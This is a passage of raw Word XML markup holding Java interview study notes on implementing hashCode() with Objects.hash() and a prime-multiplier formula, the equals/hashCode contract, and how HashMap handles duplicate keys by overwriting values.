          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FD062A2"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HashCodeExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7864DA9B"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502372F4"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mployee emp1 = new Employee(101, "John");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFDE436"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mployee emp2 = new Employee(101, "John");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7928E932" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31870D7D"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emp1.hashCode());  // Will print the hashCode value of emp1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251D44A9"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emp2.hashCode());  // Will print the hashCode value of emp2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDFCF79"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B274B1F"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D79A8F8" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F542196" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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hashCode() Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69995C1E" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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e hashCode() method, the Objects.hash() utility method is used, which combines the hash codes of multiple fields (id and name in this case). This is a simple and effective way to compute a good hash code when an object contains multiple fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6FE8EE" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ow the Objects.hash() Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F47B9DE" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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Objects.hash() method uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Arrays.hashCode()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method on the provided fields to compute individual hash codes and then combines them in a way that minimizes collisions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB25776" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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underlying implementation of Objects.hash() typically uses a combination of prime numbers and bit-shifting to ensure that the resulting hash code is well-distributed and provides good performance in hash-based collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD20D3B" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB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at is Happening Internally?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E524F39"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the hashCode() method is called for the Employee object:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B61FCA" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ep 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The method takes the values of the object's fields (in this case, id and name).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EE594E" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ep 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For each field, it computes the individual hash code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E4E5C4" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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the int type (id), the hashCode() is the value of the id itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4F87A3" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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the String type (name), the hashCode() is computed based on the characters in the string using the formula:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1366BC"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ashCode(s)=31×hashCode of previous character+current character\text{hashCode}(s) = 31 \times \text{hashCode of previous character} + \text{current character} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36591111" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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value 31 is a prime number that helps in reducing collisions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F079B1" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ep 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The individual hash codes of the fields are combined using an algorithm (like multiplication with prime numbers and addition) to generate the final hashCode for the object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51793DD6" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB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ormula for Custom hashCode() Calculation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33461FF9"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s the typical formula for calculating the hash code of an object with multiple fields:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24455625"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 result = 17;  // Arbitrary prime number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1306963F"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sult = 31 * result + field1.hashCode();  // Compute hashCode of first field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBEA954"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sult = 31 * result + field2.hashCode();  // Compute hashCode of second field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7372EF6D"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Repeat for other fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5828CD"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 result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20221239"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e case of our Employee class, it would look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5621CEB3"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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A03997E"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int hashCode() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27246944"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result = 17;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE71E29"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sult = 31 * result + id;  // id is an integer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7CD72C"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sult = 31 * result + (name != null ? name.hashCode() : 0);  // name is a String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03578961"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result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503E1246" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB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84FDE91" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB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mportant Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1A6A65" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80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sistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The hashCode() method must return the same value every time it is called on the same object, as long as the object’s state doesn’t change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F707923" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80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quals and HashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The contract between hashCode() and equals() is critical. If two objects are considered equal by the equals() method, they must also return the same hash code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E40265" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80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fficiency</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The goal is to produce a well-distributed hash code to avoid hash collisions (when two different objects have the same hash code). A good distribution of hash codes improves performance in hash-based collections, like HashMap and HashSet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3C8587" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB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62DB65A8" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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hashCode() method in Employee objects is calculated based on the fields of the object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D7C12A" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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should override the hashCode() method when you want to use custom objects (like Employee) in hash-based collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111A27A6" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ing Objects.hash() is a simple and effective way to implement hashCode() when you have multiple fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336FD868" w14:textId="77777777" w:rsidR="00637DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00637DBB" w:rsidP="00F72DB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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good hashCode() implementation helps ensure efficient access and storage in hash-based collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E034914" w14:textId="17B8436A"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D7AB680">
          <v:rect id="_x0000_i1545" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40080190" w14:textId="138C9F61" w:rsidR="00D9071D" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9071D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="177" w:name="_Toc196307657"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Can we have duplicate keys in </w:t>
      </w:r>
      <w:r w:rsidR="00065C10" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="177"/>
    </w:p>
    <w:p w14:paraId="7D69D5DE" w14:textId="1AF6D5F9" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5BE0">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No, </w:t>
      </w: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in Java does not allow duplicate keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603E9045" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5BE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B319330" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5BE0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Unique Keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: In a HashMap, each key must be unique. If you try to insert a key-value pair with a key that already exists in the map, the new value will </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>overwrite</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the old value associated with that key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E87666" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5BE0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ow it Works</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you insert a key-value pair into a HashMap, the hashCode() of the key is computed to determine which bucket to place the key-value pair in. If the key already exists (i.e., it has the same hash code and equals comparison returns true), the existing entry will be replaced with the new value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C12F85A" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5BE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0ECE719C" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5B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HashMap;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E92A24" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5BE0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C0270F5" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5B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HashMapExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B44496" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5B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42B829AD" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5B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HashMap&lt;String, String&gt; map = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E239D01" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5B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74AE9F6" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5B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John", "Engineer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFE377D" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5B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Alice", "Doctor");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A3AE4B" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5B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John", "Manager");  // This will replace the previous value for "John"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6062650F" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5B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9CBED48" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5B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map);  // Output: {John=Manager, Alice=Doctor}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5AAE28" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5B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4D82DEB" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5B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4664DBC" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5BE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at Happens Here?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C11C6F" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5BE0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81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itially, "John" is associated with "Engineer".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626CA0D2" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5BE0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81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n, we try to insert "John" again with the value "Manager". This </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the existing value ("Engineer") with "Manager".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C62719A" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5BE0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81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final HashMap contains {John=Manager, Alice=Doctor}, where the value for "John" has been updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AD0E90" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5BE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Points to Remember:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7514A09F" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5BE0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81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Duplicate Keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A HashMap only allows one value for each key. If you try to insert a duplicate key, the value will be updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3362ECB2" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5BE0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81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alues Can Be Duplicated</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: While keys must be unique, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>values</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a HashMap can be duplicated. Multiple keys can have the same value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751F4918" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5B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p.put("Mike", "Manager");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C441527" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00EA5B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p.put("Sarah", "Manager");  // Both keys have the same value "Manager"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B89C1B" w14:textId="3BAB12CA"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63EA0C9">
          <v:rect id="_x0000_i1546" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B20B8F" w14:textId="7E9AA6C8" w:rsidR="00D9071D" w:rsidRPr="00CE4B95" w:rsidRDefault="00D9071D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="178" w:name="_Toc196307658"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">How does </w:t>
      </w:r>
      <w:r w:rsidR="00065C10" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">HashMap </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>come to know that two objects are the same or different?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="178"/>
    </w:p>
    <w:p w14:paraId="6E70BDB4" w14:textId="15BFB951" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="007335A4">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a HashMap, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>equality</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
